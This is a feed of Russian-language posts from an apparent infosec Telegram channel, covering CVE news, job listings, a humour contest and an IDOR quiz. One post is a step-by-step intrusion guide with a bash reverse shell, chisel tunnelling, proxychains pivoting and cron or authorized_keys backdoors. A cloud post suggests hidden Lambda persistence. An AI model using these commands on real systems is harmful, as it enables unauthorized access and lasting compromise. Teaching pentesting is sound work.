Telegram Group Search
🥺 Что такое CVE-2023-20198 и почему это страшно

Это критическая дыра в Cisco IOS XE — прошивке, которую используют маршрутизаторы и коммутаторы.

➡️ Веб-интерфейс управления не проверяет как следует, кто именно шлёт запрос. И даже если ты обычный юзер с минимальными правами, можно сделать хитрый запрос — и стать админом.

Что можно после взлома:

• Добавлять/удалять пользователей

• Выполнять команды через CLI

• Полностью управлять устройством

💡 Как защититься:

Обновить прошивку. Никаких патчей — только апдейт.

🐸 Библиотека хакера

#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
📣 Подборка основных направлений пентестинга в 2025 году

📍 Веб-пентестинг и фреймворки

Знание их особенностей безопасности становится критически важным для пентестеров. Кроме того, использование Shodan позволяет обнаруживать скрытые ресурсы без доменных имен, расширяя возможности разведки.

📍 Интеграция ИИ в пентестинг

Системы, такие как PenTest++, интегрируют генеративный ИИ для оптимизации рабочих процессов, включая разведку, сканирование и эксплуатацию уязвимостей. Это позволяет ускорить рутинные задачи, оставляя больше времени для стратегического анализа.

📍 Пентест в финансовом секторе

Пентест в финансовом секторе фокусируется на сложной инфраструктуре и строгих регуляциях. ИИ и автоматические системы помогают быстро выявлять угрозы, а тестирование ИИ-моделей направлено на предотвращение мошенничества.

🐸 Библиотека хакера

#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
Из чего состоит модель CIA

CIA, или триада ЦРУ, — это модель политики ИБ компании.

Состоит из трех компонентов:

• конфиденциальность — это перечень нормативов, которые ограничивают доступ к информации компании; 

• целостность — гарантия достоверности и точности информации; 

• доступность — возможность сотрудникам с правом доступа пользоваться данными. 


👍 — если уже знал/а ответ
🌚 — узнал/а новое

🐸 Библиотека хакера

#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥 Конкурс: 30 000 ₽ за самую смешную IT-новость

Напоминаем о конкурсе «Библиотеки программиста»: напишите самую смешную версию реальной новости про технологии.

👾 Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переписываете ее так, чтобы смеялись все.
3. Получаете деньги и славу.

🎁 Призы:
- 1 место: 30 000 ₽ + статус ведущего нового юмористического IT-канала
- 2 и 3 место: по 5 000 ₽ + вечный почет в IT-сообществе

🏆 Как будем оценивать:
Мы выложим новости всех участников в одном из наших телеграм-каналов. Те новости, которые наберут больше всего охвата, войдут в шорт-лист. Из шорт-листа подписчики и жюри выберут победителя.

📅 Сроки: прием новостей до 11 мая включительно

Для участия отправьте свою смешную новость в гугл-форму: https://forms.gle/6YShjgfiycfJ53LX8

Осталась неделя — ждем ваших новостей!
💛 Топ-вакансий для хакеров за неделю

Middle/Senior Application Security Engineer — от 250 000 ₽, удаленно (Москва)

Инженер по информационной безопасности — от 160 000 ₽, офис (Екатеринбург)

Pentester в RedTeam команду — 150 000 - 300 000 ₽, удаленно (Москва)

Специалист по информационной безопасности — от 157 500 ₽ , офис (Казань)

Information Security Specialist (Middle) — офис (Санкт-Петербург)

➡️ Еще больше топовых вакансий — в нашем канале InfoSec jobs

🐸 Библиотека хакера

#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
Как получить доступ к внутренней сети через уязвимый веб-сервер

Пошаговая инструкция эксплуатации уязвимости RCE с пивотингом во внутреннюю инфраструктуру.

1️⃣ Сканируем на наличие RCE

➡️ Используем nmap с NSE-скриптами:

nmap -p 80,443 --script http-vuln* <target_ip>

➡️ Проводим ручной fuzzing параметров через:

— ffuf / wfuzz
— Burp Suite Repeater
— curl с параметрами вида:

curl "http://target.com/test.php?cmd=id"

⚠️ Многие RCE не обнаруживаются автоматикой — критично вручную проверить подозрительные поля на injection, command chaining (&&, |, ;), base64.

2️⃣ Эксплуатируем уязвимость

Если выполнение подтверждено (например, id, uname -a), готовим обратную оболочку.

➡️ Используем наиболее совместимый вариант — bash или nc:

# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'


➡️ Варианты на случай отсутствия bash:

python3 -c 'import socket,os,...'
php -r '...reverse shell...'
perl, nc -e, curl | sh — в зависимости от окружения


3️⃣ Получаем доступ и готовим туннель

➡️ Слушаем на своей машине:

nc -lvnp 4444

➡️ Получив оболочку, загружаем туннелирование-инструмент:

Например, chisel:

# На атакующей машине
chisel server -p 8000 --reverse


# На целевой (из полученной shell)
./chisel client <attacker_ip>:8000 R:1080:socks

⚠️ Компилируй chisel под ОС и архитектуру цели (GOOS=linux GOARCH=amd64 или windows/386 и т.д.)

4️⃣ Пивотинг во внутреннюю сеть

➡️ Используем proxychains:

Настрой файл /etc/proxychains.conf на:

socks5 127.0.0.1 1080

➡️ Проверяем доступность внутренних хостов:

proxychains nmap -sT -Pn -p 80,443 10.0.0.0/24

⚠️ Только TCP, только -sT. Для UDP/ICMP — использовать socat или meterpreter route.

5️⃣ Укрепляем доступ

➡️ Ставим бекдор для повторного входа:

- cronjob: * * * * * bash -i >& /dev/tcp/<ip>/4444 0>&1

- systemd: .service с автозапуском

- загрузка агента Metasploit

- использование ssh-keygen и подмена .ssh/authorized_keys

🧠 Примечания:

• Проверяй антивирусы, EDR, IDS — chisel, meterpreter, nc часто палятся.
• Под каждую цель адаптируй инструменты: Windows = PowerShell и plink; Linux = socat, bash.

⚠️ Disclaimer:

Все действия описаны исключительно в образовательных целях. Проведение описанных операций без разрешения владельца системы является нарушением закона.

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
💛 Android пропускает атаку в фоне, пока ты читаешь эту новость

Google выпустила майский патч безопасности Android — устранил 46 уязвимостей, но одна из них уже используется в атаках.

CVE-2025-27363 (CVSS 8.1) — критическая дыра в библиотеке FreeType, позволяет выполнить код без взаимодействия с пользователем. Ошибка устранена в FreeType 2.13.0+.

Обновление от 5 мая устраняет также баги в ядре, фреймворке, GPU PowerVR, ARM Mali, модемах MediaTek и чипах Qualcomm.

Теперь Android — это не только прошивка. Безопасность зависит от Google Play Protect и Project Mainline. Проверьте, актуален ли ваш патч 🏃‍♀️

🔗 Читай подробнее в статье

🐸 Библиотека хакера

#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
📌 Команда дня для отслеживания попыток входа

Эта команда позволяет мониторить файл аутентификации в режиме реального времени, фильтруя события, связанные с SSH:


tail -f /var/log/auth.log | grep ssh


🔘 tail -f — выводит новые строки по мере их появления.

🔘 grep ssh — фильтрует только те строки, которые содержат информацию об SSH.

Используется для:

• Отслеживания попыток подключения по SSH.

• Выявления неудачных попыток входа.

• Мониторинга активности пользователей.

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
📌 Как тестировать безопасность облачных инфраструктур

1️⃣ Подготавливаем окружение:

• Зафиксируйте цели, допустимые действия, допустимый ущерб (ROE)

• Определить зону тестирования и уточните какие сервисы используются (EC2, S3, IAM, Lambda и т.д.)

• Включите логирование — CloudTrail, GuardDuty

2️⃣ Собираем информацию:

• Определите публичные сервисы/ресурсы: S3-бакеты, API Gateway, EC2-инстансы

• Проверьте открытые DNS-записи (dig, nslookup, Amass)

3️⃣ Анализируем права доступа:

• Проверьте на наличие избыточных прав (например, *:* в политиках)

• Поищите роли, которые можно перехватить или эскалировать

• Проверьте учетные данные в переменных среды, Lambda, EC2 UserData

4️⃣ Проверяем хранилища:

• Найдите публичные бакеты

aws s3 ls s3://bucket-name --no-sign-request

• Проверьте разрешения: чтение, запись, листинг

s3:ListBucket, s3:GetObject

• Попробуйте bucket takeover через DNS или CNAME

5️⃣ Тестируем сетевую безопасность:

• Проанализируйте Security Groups и NACLs: открытые порты, экспонированные сервисы

• Поищите интернал-сервисов через разрешённые VPC endpoints

6️⃣ Атакуем бессерверные сервисы:

• Протестируйте API на ошибки (XSS, IDOR, Injection)

• Поищите секреты в ENV, логи, исходный код

7️⃣ Проводим постэксплуатацию:

• Исследуйте другие регионы, сервисы, связанные аккаунты

• Создайте скрытые Lambda-функции или роли с автоматическим запуском.

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍 Подкаст для тех, кто предпочитает знать, как их взломают

Кверти — подкаст о кибербезе без скучных лекций. Его ведут специалист по информационной безопасности и параноик-энтузиаст, который всегда ждёт подвоха.

Они обсуждают, как устроен мир цифровых угроз, на чем ловят пользователей и что на самом деле происходит за кулисами индустрии защиты.

Рекомендуемые выпуски:

➡️ Как развивать свои скиллы в AppSec

Практика, сертификация BSCP, реальные вызовы и влияние на карьеру.

➡️ Как становятся пентестерами

Немного истории появления пентеста, обсуждению личности Кевина Митника и различиям между видами пентеста.

➡️ Кто такой баг-хантер и как им стать

Разница с пентестерами и AppSec, старт в баг-баунти и типичные ошибки.

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🟢 Грин-флаги в вакансиях

Если вы ищете работу в ИБ, вакансия — это первое, что говорит о зрелости процессов в компании.

Что в статье:

📍 Как определить, есть ли в компании реальные процессы, а не просто желание «чтобы ИБшник был»

📍 Почему отсутствие точного описания задач = сигнал тревоги

📍 Что говорит о зрелом подходе: от прозрачной ЗП до роли безопасности в разработке

📍 Как читать между строк: если не указаны инструменты, бюджеты и зона ответственности — стоит задуматься

🔗 Читайте полный разбор на Proglib

🐸 Библиотека хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
🎯 Подборка платформ для прокачки навыков в кибербезопасности

➡️ Web Security Academy: бесплатный онлайн-курс по веб-безопасности от создателей Burp Suite.

➡️ TryHackMe: учебные «комнаты» с теорией и практикой. Подходит новичкам и профи.

➡️ Школа Цифровой Безопасности Positive Technologies: курсы и лаборатории для студентов и молодых специалистов, часто проводятся практики, тренировки, mini-CTF

➡️ RangeForce: корпоративно-ориентированная платформа с Red и Blue Team тренажёрами.

➡️ BlueTeamLabs Online: тренажёр по защите: анализ инцидентов, threat hunting, лог-анализ.

🐸 Библиотека хакера

#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
💡 Удаление без прав — найдите уязвимость

Вы видите, что кнопка «Удалить пользователя» доступна только администраторам, вы не авторизованы как админ, но знаете URL и параметры.

На другой странице вы нашли следующий HTML-код формы:


<form action="/deleteUser?id=5" method="POST">


Какой тип атаки здесь возможен? Пишите ваши догадки в комментариях ✏️

Правильный ответ:

Если кнопка скрыта на клиенте, но запрос POST /deleteUser?id=5 можно отправить вручную — это уязвимость прямого доступа к объекту (IDOR). Она возникает, когда проверка прав проводится только на уровне интерфейса, но не на сервере.

Даже если пользователь не видит кнопку, он может:

— Сформировать POST-запрос вручную (через Postman, curl, Burp),

— Создать собственную HTML-форму и отправить её.

Если сервер выполняет запрос без проверки прав доступа — это критическая ошибка авторизации.

💡 Сервер должен проверять: «Имеет ли текущий пользователь право удалить id=5?»

🐸 Библиотека хакера

#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
😳 Топ-вакансий для хакеров за неделю

Менеджер по защите ИТ инфраструктуры — гибрид/удаленка (Москва)

Инженер по информационной безопасности (AppSec) — офис/гибрид (Москва)

DevSecOps Engineer — 300 000 —‍ 350 000 ₽, удаленно (Москва)

DevSecOps — удаленно/гибрид (Москва)

Инженер по информационной безопасности — от 310 000 ₽, удаленно (Москва)

➡️ Еще больше топовых вакансий — в нашем канале InfoSec jobs

🐸 Библиотека хакера

#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
Криптографические методы

Цели защиты (Ц, К, А, Н): указывает, какие цели обеспечиваются каждым методом:

➡️ Ц — конфиденциальность

➡️ К — контроль целостности

➡️ А — аутентификация

➡️ Н — нен repudiation (неотказуемость)

Где пригодится шпаргалка:

— На экзаменах по ИБ (например, CompTIA, OSCP, КС1/КС2).

— При составлении методологий для оценки криптозащиты в ИС.

— Во время проведения аудита систем хранения и передачи данных.

— На практике при пентестах для выбора правильных векторов атаки на криптографию.

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔐 Критическое обновление от SAP

SAP выпустила срочное обновление безопасности для устранения опасной уязвимости нулевого дня — CVE-2025-31324, которая уже активно используется злоумышленниками в атаках.

📌 Обновление устраняет 15 уязвимостей, включая критические,

📌 Уязвимость затрагивает системы, используемые в финансовом секторе, производстве, госсекторе и логистике,

📌 Есть риск удаленного выполнения кода и компрометации корпоративных данных.

Что делать:

— Немедленно установить обновления, выпущенные в рамках майского Patch Day от SAP.

— Проверить свои системы на наличие следов эксплуатации.

— Обновить политики реагирования на инциденты.

Задержка с установкой патча может привести к серьёзным последствиям: от утечек данных до простоев критичных бизнес-процессов.

🔗 Источник

🐸 Библиотека хакера

#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
2025/05/13 00:38:02
Back to Top
HTML Embed Code: